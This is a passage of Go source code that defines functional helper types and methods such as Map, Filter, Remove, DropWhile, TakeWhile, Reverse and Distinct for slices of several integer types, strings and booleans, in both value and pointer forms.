// int16FunctorForMap transforms one int16 element into another.
type int16FunctorForMap func(int16) int16

// int16FunctorForFilter reports whether an int16 element satisfies a predicate.
type int16FunctorForFilter func(int16) bool

// int16SlicePtr is the []*int16 counterpart of int16Slice.
type int16SlicePtr []*int16

// int16FunctorForMapPtr transforms one *int16 element into another.
type int16FunctorForMapPtr func(*int16) *int16

// int16FunctorForFilterPtr reports whether a *int16 element satisfies a predicate.
type int16FunctorForFilterPtr func(*int16) bool

// MakeInt16Slice creates a slice usable with the functional methods such as Map and Filter.
func MakeInt16Slice(values ...int16) int16Slice {
	newSlice := int16Slice(values)
	return newSlice
}

// Map applies each function, in order, to every item of the list and
// returns the resulting new list. Nil functions are skipped.
func (slice int16Slice) Map(functors ...int16FunctorForMap) int16Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = MapInt16(f, tmpSlice)
	}
	return tmpSlice
}

// MakeInt16SlicePtr creates a pointer slice usable with the functional methods such as MapPtr and FilterPtr.
func MakeInt16SlicePtr(values ...*int16) int16SlicePtr {
	newSlice := int16SlicePtr(values)
	return newSlice
}

// MapPtr applies each function, in order, to every item of the list and
// returns the resulting new list. Nil functions are skipped.
func (slice int16SlicePtr) MapPtr(functors ...int16FunctorForMapPtr) int16SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = MapInt16Ptr(f, tmpSlice)
	}
	return tmpSlice
}

// Filter keeps only the items that satisfy every supplied predicate.
// Nil predicates are skipped.
func (slice int16Slice) Filter(functors ...int16FunctorForFilter) int16Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = FilterInt16(f, tmpSlice)
	}
	return tmpSlice
}

// FilterPtr keeps only the items that satisfy every supplied predicate.
// Nil predicates are skipped.
func (slice int16SlicePtr) FilterPtr(functors ...int16FunctorForFilterPtr) int16SlicePtr {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = FilterInt16Ptr(f, tmpSlice)
	}
	return tmpSlice
}

// Remove drops the items matched by the supplied predicates and returns the
// new list. Nil predicates are skipped.
func (slice int16Slice) Remove(functors ...int16FunctorForFilter) int16Slice {
	tmpSlice := slice
	for _, f := range functors {
		if f == nil {
			continue
		}
		tmpSlice = RemoveInt16(f, tmpSlice)
	}
	return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice int16SlicePtr) RemovePtr(functors ...int16FunctorForFilterPtr) int16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveInt16Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice int16Slice) DropWhile(functors ...int16FunctorForFilter) int16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt16(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice int16SlicePtr) DropWhilePtr(functors ...int16FunctorForFilterPtr) int16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt16Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice int16Slice) Reverse() int16Slice {
return ReverseInts16(slice)
}
// ReversePtr - reverse the list
func (slice int16SlicePtr) ReversePtr() int16SlicePtr {
return ReverseInts16Ptr(slice)
}
// Distinct - removes duplicates
func (slice int16Slice) Distinct() int16Slice {
return DistinctInt16(slice)
}
// DistinctPtr - removes duplicates
func (slice int16SlicePtr) DistinctPtr() int16SlicePtr {
return DistinctInt16Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice int16Slice) TakeWhile(functors ...int16FunctorForFilter) int16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt16(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice int16SlicePtr) TakeWhilePtr(functors ...int16FunctorForFilterPtr) int16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt16Ptr(f, tmpSlice)
}
return tmpSlice
}
// Functional-helper types for int8 values and *int8 pointers.
type int8Slice []int8
type int8FunctorForMap func(int8) int8
type int8FunctorForFilter func(int8) bool
type int8SlicePtr []*int8
type int8FunctorForMapPtr func(*int8) *int8
type int8FunctorForFilterPtr func(*int8) bool

// MakeInt8Slice - creates slice for the functional method such as map, filter
func MakeInt8Slice(values ...int8) int8Slice {
	return int8Slice(values)
}

// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice int8Slice) Map(functors ...int8FunctorForMap) int8Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapInt8(fn, result)
		}
	}
	return result
}

// MakeInt8SlicePtr - creates slice for the functional method such as map, filter
func MakeInt8SlicePtr(values ...*int8) int8SlicePtr {
	return int8SlicePtr(values)
}

// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice int8SlicePtr) MapPtr(functors ...int8FunctorForMapPtr) int8SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapInt8Ptr(fn, result)
		}
	}
	return result
}

// Filter - filters list based on function passed as argument
func (slice int8Slice) Filter(functors ...int8FunctorForFilter) int8Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterInt8(fn, result)
		}
	}
	return result
}

// FilterPtr - filters list based on function passed as argument
func (slice int8SlicePtr) FilterPtr(functors ...int8FunctorForFilterPtr) int8SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterInt8Ptr(fn, result)
		}
	}
	return result
}

// Remove - removes the items from the given list based on supplied function and returns new list
func (slice int8Slice) Remove(functors ...int8FunctorForFilter) int8Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveInt8(fn, result)
		}
	}
	return result
}

// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice int8SlicePtr) RemovePtr(functors ...int8FunctorForFilterPtr) int8SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveInt8Ptr(fn, result)
		}
	}
	return result
}

// DropWhile - drops the items from the list as long as condition satisfies
func (slice int8Slice) DropWhile(functors ...int8FunctorForFilter) int8Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileInt8(fn, result)
		}
	}
	return result
}

// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice int8SlicePtr) DropWhilePtr(functors ...int8FunctorForFilterPtr) int8SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileInt8Ptr(fn, result)
		}
	}
	return result
}

// Reverse - reverse the list
func (slice int8Slice) Reverse() int8Slice {
	return ReverseInts8(slice)
}

// ReversePtr - reverse the list
func (slice int8SlicePtr) ReversePtr() int8SlicePtr {
	return ReverseInts8Ptr(slice)
}

// Distinct - removes duplicates
func (slice int8Slice) Distinct() int8Slice {
	return DistinctInt8(slice)
}

// DistinctPtr - removes duplicates
func (slice int8SlicePtr) DistinctPtr() int8SlicePtr {
	return DistinctInt8Ptr(slice)
}

// TakeWhile - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice int8Slice) TakeWhile(functors ...int8FunctorForFilter) int8Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileInt8(fn, result)
		}
	}
	return result
}

// TakeWhilePtr - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice int8SlicePtr) TakeWhilePtr(functors ...int8FunctorForFilterPtr) int8SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileInt8Ptr(fn, result)
		}
	}
	return result
}
// Functional-helper types for uint values and *uint pointers.
type uintSlice []uint
type uintFunctorForMap func(uint) uint
type uintFunctorForFilter func(uint) bool
type uintSlicePtr []*uint
type uintFunctorForMapPtr func(*uint) *uint
type uintFunctorForFilterPtr func(*uint) bool

// MakeUintSlice - creates slice for the functional method such as map, filter
func MakeUintSlice(values ...uint) uintSlice {
	return uintSlice(values)
}

// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice uintSlice) Map(functors ...uintFunctorForMap) uintSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapUint(fn, result)
		}
	}
	return result
}

// MakeUintSlicePtr - creates slice for the functional method such as map, filter
func MakeUintSlicePtr(values ...*uint) uintSlicePtr {
	return uintSlicePtr(values)
}

// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice uintSlicePtr) MapPtr(functors ...uintFunctorForMapPtr) uintSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapUintPtr(fn, result)
		}
	}
	return result
}

// Filter - filters list based on function passed as argument
func (slice uintSlice) Filter(functors ...uintFunctorForFilter) uintSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterUint(fn, result)
		}
	}
	return result
}

// FilterPtr - filters list based on function passed as argument
func (slice uintSlicePtr) FilterPtr(functors ...uintFunctorForFilterPtr) uintSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterUintPtr(fn, result)
		}
	}
	return result
}

// Remove - removes the items from the given list based on supplied function and returns new list
func (slice uintSlice) Remove(functors ...uintFunctorForFilter) uintSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveUint(fn, result)
		}
	}
	return result
}

// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice uintSlicePtr) RemovePtr(functors ...uintFunctorForFilterPtr) uintSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveUintPtr(fn, result)
		}
	}
	return result
}

// DropWhile - drops the items from the list as long as condition satisfies
func (slice uintSlice) DropWhile(functors ...uintFunctorForFilter) uintSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileUint(fn, result)
		}
	}
	return result
}

// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice uintSlicePtr) DropWhilePtr(functors ...uintFunctorForFilterPtr) uintSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileUintPtr(fn, result)
		}
	}
	return result
}

// Reverse - reverse the list
func (slice uintSlice) Reverse() uintSlice {
	return ReverseUints(slice)
}

// ReversePtr - reverse the list
func (slice uintSlicePtr) ReversePtr() uintSlicePtr {
	return ReverseUintsPtr(slice)
}

// Distinct - removes duplicates
func (slice uintSlice) Distinct() uintSlice {
	return DistinctUint(slice)
}

// DistinctPtr - removes duplicates
func (slice uintSlicePtr) DistinctPtr() uintSlicePtr {
	return DistinctUintPtr(slice)
}

// TakeWhile - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice uintSlice) TakeWhile(functors ...uintFunctorForFilter) uintSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileUint(fn, result)
		}
	}
	return result
}

// TakeWhilePtr - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice uintSlicePtr) TakeWhilePtr(functors ...uintFunctorForFilterPtr) uintSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileUintPtr(fn, result)
		}
	}
	return result
}
// Functional-helper types for uint64 values and *uint64 pointers.
type uint64Slice []uint64
type uint64FunctorForMap func(uint64) uint64
type uint64FunctorForFilter func(uint64) bool
type uint64SlicePtr []*uint64
type uint64FunctorForMapPtr func(*uint64) *uint64
type uint64FunctorForFilterPtr func(*uint64) bool

// MakeUint64Slice - creates slice for the functional method such as map, filter
func MakeUint64Slice(values ...uint64) uint64Slice {
	return uint64Slice(values)
}

// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice uint64Slice) Map(functors ...uint64FunctorForMap) uint64Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapUint64(fn, result)
		}
	}
	return result
}

// MakeUint64SlicePtr - creates slice for the functional method such as map, filter
func MakeUint64SlicePtr(values ...*uint64) uint64SlicePtr {
	return uint64SlicePtr(values)
}

// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice uint64SlicePtr) MapPtr(functors ...uint64FunctorForMapPtr) uint64SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapUint64Ptr(fn, result)
		}
	}
	return result
}

// Filter - filters list based on function passed as argument
func (slice uint64Slice) Filter(functors ...uint64FunctorForFilter) uint64Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterUint64(fn, result)
		}
	}
	return result
}

// FilterPtr - filters list based on function passed as argument
func (slice uint64SlicePtr) FilterPtr(functors ...uint64FunctorForFilterPtr) uint64SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterUint64Ptr(fn, result)
		}
	}
	return result
}

// Remove - removes the items from the given list based on supplied function and returns new list
func (slice uint64Slice) Remove(functors ...uint64FunctorForFilter) uint64Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveUint64(fn, result)
		}
	}
	return result
}

// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice uint64SlicePtr) RemovePtr(functors ...uint64FunctorForFilterPtr) uint64SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveUint64Ptr(fn, result)
		}
	}
	return result
}

// DropWhile - drops the items from the list as long as condition satisfies
func (slice uint64Slice) DropWhile(functors ...uint64FunctorForFilter) uint64Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileUint64(fn, result)
		}
	}
	return result
}

// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice uint64SlicePtr) DropWhilePtr(functors ...uint64FunctorForFilterPtr) uint64SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileUint64Ptr(fn, result)
		}
	}
	return result
}

// Reverse - reverse the list
func (slice uint64Slice) Reverse() uint64Slice {
	return ReverseUint64s(slice)
}

// ReversePtr - reverse the list
func (slice uint64SlicePtr) ReversePtr() uint64SlicePtr {
	return ReverseUint64sPtr(slice)
}

// Distinct - removes duplicates
func (slice uint64Slice) Distinct() uint64Slice {
	return DistinctUint64(slice)
}

// DistinctPtr - removes duplicates
func (slice uint64SlicePtr) DistinctPtr() uint64SlicePtr {
	return DistinctUint64Ptr(slice)
}

// TakeWhile - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice uint64Slice) TakeWhile(functors ...uint64FunctorForFilter) uint64Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileUint64(fn, result)
		}
	}
	return result
}

// TakeWhilePtr - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice uint64SlicePtr) TakeWhilePtr(functors ...uint64FunctorForFilterPtr) uint64SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileUint64Ptr(fn, result)
		}
	}
	return result
}
// Functional-helper types for uint32 values and *uint32 pointers.
type uint32Slice []uint32
type uint32FunctorForMap func(uint32) uint32
type uint32FunctorForFilter func(uint32) bool
type uint32SlicePtr []*uint32
type uint32FunctorForMapPtr func(*uint32) *uint32
type uint32FunctorForFilterPtr func(*uint32) bool

// MakeUint32Slice - creates slice for the functional method such as map, filter
func MakeUint32Slice(values ...uint32) uint32Slice {
	return uint32Slice(values)
}

// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice uint32Slice) Map(functors ...uint32FunctorForMap) uint32Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapUint32(fn, result)
		}
	}
	return result
}

// MakeUint32SlicePtr - creates slice for the functional method such as map, filter
func MakeUint32SlicePtr(values ...*uint32) uint32SlicePtr {
	return uint32SlicePtr(values)
}

// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice uint32SlicePtr) MapPtr(functors ...uint32FunctorForMapPtr) uint32SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapUint32Ptr(fn, result)
		}
	}
	return result
}

// Filter - filters list based on function passed as argument
func (slice uint32Slice) Filter(functors ...uint32FunctorForFilter) uint32Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterUint32(fn, result)
		}
	}
	return result
}

// FilterPtr - filters list based on function passed as argument
func (slice uint32SlicePtr) FilterPtr(functors ...uint32FunctorForFilterPtr) uint32SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterUint32Ptr(fn, result)
		}
	}
	return result
}

// Remove - removes the items from the given list based on supplied function and returns new list
func (slice uint32Slice) Remove(functors ...uint32FunctorForFilter) uint32Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveUint32(fn, result)
		}
	}
	return result
}

// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice uint32SlicePtr) RemovePtr(functors ...uint32FunctorForFilterPtr) uint32SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveUint32Ptr(fn, result)
		}
	}
	return result
}

// DropWhile - drops the items from the list as long as condition satisfies
func (slice uint32Slice) DropWhile(functors ...uint32FunctorForFilter) uint32Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileUint32(fn, result)
		}
	}
	return result
}

// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice uint32SlicePtr) DropWhilePtr(functors ...uint32FunctorForFilterPtr) uint32SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileUint32Ptr(fn, result)
		}
	}
	return result
}

// Reverse - reverse the list
func (slice uint32Slice) Reverse() uint32Slice {
	return ReverseUints32(slice)
}

// ReversePtr - reverse the list
func (slice uint32SlicePtr) ReversePtr() uint32SlicePtr {
	return ReverseUints32Ptr(slice)
}

// Distinct - removes duplicates
func (slice uint32Slice) Distinct() uint32Slice {
	return DistinctUint32(slice)
}

// DistinctPtr - removes duplicates
func (slice uint32SlicePtr) DistinctPtr() uint32SlicePtr {
	return DistinctUint32Ptr(slice)
}

// TakeWhile - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice uint32Slice) TakeWhile(functors ...uint32FunctorForFilter) uint32Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileUint32(fn, result)
		}
	}
	return result
}

// TakeWhilePtr - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice uint32SlicePtr) TakeWhilePtr(functors ...uint32FunctorForFilterPtr) uint32SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileUint32Ptr(fn, result)
		}
	}
	return result
}
// Functional-helper types for uint16 values and *uint16 pointers.
type uint16Slice []uint16
type uint16FunctorForMap func(uint16) uint16
type uint16FunctorForFilter func(uint16) bool
type uint16SlicePtr []*uint16
type uint16FunctorForMapPtr func(*uint16) *uint16
type uint16FunctorForFilterPtr func(*uint16) bool

// MakeUint16Slice - creates slice for the functional method such as map, filter
func MakeUint16Slice(values ...uint16) uint16Slice {
	return uint16Slice(values)
}

// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice uint16Slice) Map(functors ...uint16FunctorForMap) uint16Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapUint16(fn, result)
		}
	}
	return result
}

// MakeUint16SlicePtr - creates slice for the functional method such as map, filter
func MakeUint16SlicePtr(values ...*uint16) uint16SlicePtr {
	return uint16SlicePtr(values)
}

// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice uint16SlicePtr) MapPtr(functors ...uint16FunctorForMapPtr) uint16SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapUint16Ptr(fn, result)
		}
	}
	return result
}

// Filter - filters list based on function passed as argument
func (slice uint16Slice) Filter(functors ...uint16FunctorForFilter) uint16Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterUint16(fn, result)
		}
	}
	return result
}

// FilterPtr - filters list based on function passed as argument
func (slice uint16SlicePtr) FilterPtr(functors ...uint16FunctorForFilterPtr) uint16SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterUint16Ptr(fn, result)
		}
	}
	return result
}

// Remove - removes the items from the given list based on supplied function and returns new list
func (slice uint16Slice) Remove(functors ...uint16FunctorForFilter) uint16Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveUint16(fn, result)
		}
	}
	return result
}

// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice uint16SlicePtr) RemovePtr(functors ...uint16FunctorForFilterPtr) uint16SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveUint16Ptr(fn, result)
		}
	}
	return result
}

// DropWhile - drops the items from the list as long as condition satisfies
func (slice uint16Slice) DropWhile(functors ...uint16FunctorForFilter) uint16Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileUint16(fn, result)
		}
	}
	return result
}

// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice uint16SlicePtr) DropWhilePtr(functors ...uint16FunctorForFilterPtr) uint16SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileUint16Ptr(fn, result)
		}
	}
	return result
}

// Reverse - reverse the list
func (slice uint16Slice) Reverse() uint16Slice {
	return ReverseUints16(slice)
}

// ReversePtr - reverse the list
func (slice uint16SlicePtr) ReversePtr() uint16SlicePtr {
	return ReverseUints16Ptr(slice)
}

// Distinct - removes duplicates
func (slice uint16Slice) Distinct() uint16Slice {
	return DistinctUint16(slice)
}

// DistinctPtr - removes duplicates
func (slice uint16SlicePtr) DistinctPtr() uint16SlicePtr {
	return DistinctUint16Ptr(slice)
}

// TakeWhile - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice uint16Slice) TakeWhile(functors ...uint16FunctorForFilter) uint16Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileUint16(fn, result)
		}
	}
	return result
}

// TakeWhilePtr - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice uint16SlicePtr) TakeWhilePtr(functors ...uint16FunctorForFilterPtr) uint16SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileUint16Ptr(fn, result)
		}
	}
	return result
}
// Functional-helper types for uint8 values and *uint8 pointers.
type uint8Slice []uint8
type uint8FunctorForMap func(uint8) uint8
type uint8FunctorForFilter func(uint8) bool
type uint8SlicePtr []*uint8
type uint8FunctorForMapPtr func(*uint8) *uint8
type uint8FunctorForFilterPtr func(*uint8) bool

// MakeUint8Slice - creates slice for the functional method such as map, filter
func MakeUint8Slice(values ...uint8) uint8Slice {
	return uint8Slice(values)
}

// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice uint8Slice) Map(functors ...uint8FunctorForMap) uint8Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapUint8(fn, result)
		}
	}
	return result
}

// MakeUint8SlicePtr - creates slice for the functional method such as map, filter
func MakeUint8SlicePtr(values ...*uint8) uint8SlicePtr {
	return uint8SlicePtr(values)
}

// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice uint8SlicePtr) MapPtr(functors ...uint8FunctorForMapPtr) uint8SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapUint8Ptr(fn, result)
		}
	}
	return result
}

// Filter - filters list based on function passed as argument
func (slice uint8Slice) Filter(functors ...uint8FunctorForFilter) uint8Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterUint8(fn, result)
		}
	}
	return result
}

// FilterPtr - filters list based on function passed as argument
func (slice uint8SlicePtr) FilterPtr(functors ...uint8FunctorForFilterPtr) uint8SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterUint8Ptr(fn, result)
		}
	}
	return result
}

// Remove - removes the items from the given list based on supplied function and returns new list
func (slice uint8Slice) Remove(functors ...uint8FunctorForFilter) uint8Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveUint8(fn, result)
		}
	}
	return result
}

// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice uint8SlicePtr) RemovePtr(functors ...uint8FunctorForFilterPtr) uint8SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveUint8Ptr(fn, result)
		}
	}
	return result
}

// DropWhile - drops the items from the list as long as condition satisfies
func (slice uint8Slice) DropWhile(functors ...uint8FunctorForFilter) uint8Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileUint8(fn, result)
		}
	}
	return result
}

// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice uint8SlicePtr) DropWhilePtr(functors ...uint8FunctorForFilterPtr) uint8SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileUint8Ptr(fn, result)
		}
	}
	return result
}

// Reverse - reverse the list
func (slice uint8Slice) Reverse() uint8Slice {
	return ReverseUints8(slice)
}

// ReversePtr - reverse the list
func (slice uint8SlicePtr) ReversePtr() uint8SlicePtr {
	return ReverseUints8Ptr(slice)
}

// Distinct - removes duplicates
func (slice uint8Slice) Distinct() uint8Slice {
	return DistinctUint8(slice)
}

// DistinctPtr - removes duplicates
func (slice uint8SlicePtr) DistinctPtr() uint8SlicePtr {
	return DistinctUint8Ptr(slice)
}

// TakeWhile - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice uint8Slice) TakeWhile(functors ...uint8FunctorForFilter) uint8Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileUint8(fn, result)
		}
	}
	return result
}

// TakeWhilePtr - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice uint8SlicePtr) TakeWhilePtr(functors ...uint8FunctorForFilterPtr) uint8SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileUint8Ptr(fn, result)
		}
	}
	return result
}
// Functional-helper types for string values and *string pointers.
type stringSlice []string
type stringFunctorForMap func(string) string
type stringFunctorForFilter func(string) bool
type stringSlicePtr []*string
type stringFunctorForMapPtr func(*string) *string
type stringFunctorForFilterPtr func(*string) bool

// MakeStrSlice - creates slice for the functional method such as map, filter
func MakeStrSlice(values ...string) stringSlice {
	return stringSlice(values)
}

// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice stringSlice) Map(functors ...stringFunctorForMap) stringSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapStr(fn, result)
		}
	}
	return result
}

// MakeStrSlicePtr - creates slice for the functional method such as map, filter
func MakeStrSlicePtr(values ...*string) stringSlicePtr {
	return stringSlicePtr(values)
}

// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice stringSlicePtr) MapPtr(functors ...stringFunctorForMapPtr) stringSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapStrPtr(fn, result)
		}
	}
	return result
}

// Filter - filters list based on function passed as argument
func (slice stringSlice) Filter(functors ...stringFunctorForFilter) stringSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterStr(fn, result)
		}
	}
	return result
}

// FilterPtr - filters list based on function passed as argument
func (slice stringSlicePtr) FilterPtr(functors ...stringFunctorForFilterPtr) stringSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterStrPtr(fn, result)
		}
	}
	return result
}

// Remove - removes the items from the given list based on supplied function and returns new list
func (slice stringSlice) Remove(functors ...stringFunctorForFilter) stringSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveStr(fn, result)
		}
	}
	return result
}

// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice stringSlicePtr) RemovePtr(functors ...stringFunctorForFilterPtr) stringSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveStrPtr(fn, result)
		}
	}
	return result
}

// DropWhile - drops the items from the list as long as condition satisfies
func (slice stringSlice) DropWhile(functors ...stringFunctorForFilter) stringSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileStr(fn, result)
		}
	}
	return result
}

// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice stringSlicePtr) DropWhilePtr(functors ...stringFunctorForFilterPtr) stringSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileStrPtr(fn, result)
		}
	}
	return result
}

// Reverse - reverse the list
func (slice stringSlice) Reverse() stringSlice {
	return ReverseStrs(slice)
}

// ReversePtr - reverse the list
func (slice stringSlicePtr) ReversePtr() stringSlicePtr {
	return ReverseStrsPtr(slice)
}

// Distinct - removes duplicates
func (slice stringSlice) Distinct() stringSlice {
	return DistinctStr(slice)
}

// DistinctPtr - removes duplicates
func (slice stringSlicePtr) DistinctPtr() stringSlicePtr {
	return DistinctStrPtr(slice)
}

// TakeWhile - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice stringSlice) TakeWhile(functors ...stringFunctorForFilter) stringSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileStr(fn, result)
		}
	}
	return result
}

// TakeWhilePtr - returns a new list based on predicate function; it stops taking items once the condition fails.
func (slice stringSlicePtr) TakeWhilePtr(functors ...stringFunctorForFilterPtr) stringSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileStrPtr(fn, result)
		}
	}
	return result
}
type boolSlice []bool
type boolFunctorForMap func(bool) bool
type boolFunctorForFilter func(bool) bool
type boolSlicePtr []*bool
type boolFunctorForMapPtr func(*bool) *bool
type boolFunctorForFilterPtr func(*bool) bool

// MakeBoolSlice - creates slice for the functional method such as map, filter
func MakeBoolSlice(values ...bool) boolSlice {
	return boolSlice(values)
}

// Map - applies the function(1st argument) on each item of the list and returns new list
